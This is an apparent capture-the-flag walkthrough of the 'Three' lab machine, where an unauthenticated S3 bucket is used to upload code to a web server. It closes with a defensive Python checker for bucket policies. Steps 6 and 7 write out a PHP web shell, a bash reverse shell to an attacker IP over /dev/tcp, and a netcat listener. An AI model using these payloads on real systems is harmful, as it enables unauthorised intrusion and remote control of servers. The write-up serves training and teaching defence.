Three#
Description#
Three is a Linux machine hosting a website that uses an AWS S3 bucket as its cloud storage.
The bucket is misconfigured, allowing us to upload a malicious file.
By executing this file through the website, we can gain remote access to the system and retrieve the flag.
Enumeration#
Step 1: Scanning the Target for Open Ports#
Start with a full port scan to identify services running on the machine:
nmap -sV -p- 10.129.227.248 -T4
Output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Findings:
- Port 22 (SSH) is open.
- Port 80 (HTTP) is hosting a website.
Step 2: Exploring the Website#
- Visit the site in your browser using the target IP on port 80.
- Check the Contact section and note the email address:
mail@thetoppers.htb
Since the domain thetoppers.htb is being used, map it to the target IP in your /etc/hosts file:
echo "10.129.227.248 thetoppers.htb" | sudo tee -a /etc/hosts
Tip:
/etc/hosts lets you manually link a domain name to an IP address so your computer can access the site without DNS.
Step 3: Enumerating Subdomains#
Use ffuf to brute-force possible subdomains:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://thetoppers.htb \
-H "Host: FUZZ.thetoppers.htb" \
-ac
Result:
s3.thetoppers.htb
Map this subdomain as well:
echo "10.129.227.248 s3.thetoppers.htb" | sudo tee -a /etc/hosts
Visit it in the browser or via curl:
curl http://s3.thetoppers.htb
Output:
{"status": "running"}
This indicates that the site is using an Amazon S3-like storage service.
What is Amazon S3? Amazon Simple Storage Service (S3) is a cloud service that stores files. A misconfigured S3 bucket can allow unauthorized reading, writing, or deleting of files.
Configuring and Interacting with the S3 Bucket#
Step 4: Setting Up AWS CLI#
Install and configure the AWS CLI if you haven’t already:
aws configure
Use temporary placeholder values since authentication is not enforced:
AWS Access Key ID [None]: temp
AWS Secret Access Key [None]: temp
Default region name [None]: temp
Default output format [None]: temp
Step 5: Listing Buckets and Files#
List all available buckets:
aws --endpoint=http://s3.thetoppers.htb s3 ls
List files inside the bucket:
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
Exploiting the S3 Bucket#
Step 6: Uploading a Web Shell#
Create a simple PHP shell locally:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Upload the shell:
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
Visit the uploaded file to test command execution:
http://thetoppers.htb/shell.php?cmd=whoami
Output:
www-data
This confirms that you can run commands on the server.
Step 7: Setting Up a Reverse Shell#
Create a reverse shell script locally (change 10.10.16.2 to your attacker IP):
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.16.2/1234 0>&1' > shell.sh
Upload the script:
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.sh s3://thetoppers.htb
Set up a listener on your machine:
nc -lvnp 1234
Trigger the reverse shell by visiting:
http://thetoppers.htb/shell.php?cmd=bash%20shell.sh
Output:
listening on [any] 1234 ...
connect to [10.10.16.2] from (UNKNOWN) [10.129.227.248] 44028
bash: no job control in this shell
www-data@three:/var/www/html$
Post-Exploitation#
Step 8: Finding the Flag#
Once connected, look for the flag:
locate flag.txt
Output:
/var/www/flag.txt
Read the flag:
cat /var/www/flag.txt
Blue Team Notes#
The root cause is an S3 bucket that accepts unauthenticated writes and is served from the web root, so an uploaded PHP file is executed by Apache as www-data.
To prevent such issues:
- Restrict bucket permissions to only trusted IAM users.
- Disable public access unless explicitly required.
- Monitor bucket activity logs for unusual operations.
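As an added defender-side example (not part of the original writeup), the check below audits a bucket policy document for the exact weakness exploited here: an Allow statement that grants write actions to the anonymous principal with no Condition. Both policies are constructed for the example, and the account id and role name in the hardened one are hypothetical placeholders.

```python
import json

# Constructed bucket policy mirroring the writeup's weakness: the anonymous
# principal "*" may write objects, so anyone can upload shell.php.
WEAK_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Sid": "PublicWrite", "Effect": "Allow", "Principal": "*",
    "Action": ["s3:GetObject", "s3:PutObject"],
    "Resource": "arn:aws:s3:::thetoppers.htb/*"}]})

# Constructed hardened policy: reads stay public for the website, but only a
# named deployment role (hypothetical account id and role name) may write.
HARDENED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thetoppers.htb/*"},
    {"Sid": "DeployWrite", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/site-deploy"},
     "Action": ["s3:PutObject", "s3:DeleteObject"],
     "Resource": "arn:aws:s3:::thetoppers.htb/*"}]})

# Actions that create, replace or remove objects (lower-cased for comparison).
WRITE_ACTIONS = {"s3:putobject", "s3:putobjectacl", "s3:deleteobject", "s3:*", "*"}

def _as_list(value):
    # Policy fields may be a single string or a list; normalise to a list.
    return [value] if isinstance(value, str) else list(value or [])

def _is_anonymous(principal):
    # "*" or {"AWS": "*"} means any caller, including unauthenticated ones.
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))

def find_public_writes(policy_json):
    # Return Sids of Allow statements that grant a write action to everyone
    # and carry no Condition block that could narrow the callers.
    findings = []
    for stmt in json.loads(policy_json).get("Statement", []):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        if _is_anonymous(stmt.get("Principal")) and actions & WRITE_ACTIONS:
            findings.append(stmt.get("Sid", "<no Sid>"))
    return findings

if __name__ == "__main__":
    print("weak policy:", find_public_writes(WEAK_POLICY))          # ['PublicWrite']
    print("hardened policy:", find_public_writes(HARDENED_POLICY))  # []
```

On a real bucket the policy string to feed into find_public_writes comes from `aws s3api get-bucket-policy --bucket <name>` (the `Policy` field of its output); pair the check with the account-level S3 Block Public Access setting, which would have refused this bucket's public write grant outright.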
Key Takeaways#
- Misconfigured S3 buckets are a common attack vector.
- Always enumerate subdomains when testing web applications.
- Gaining command execution can often lead to a reverse shell for deeper access.
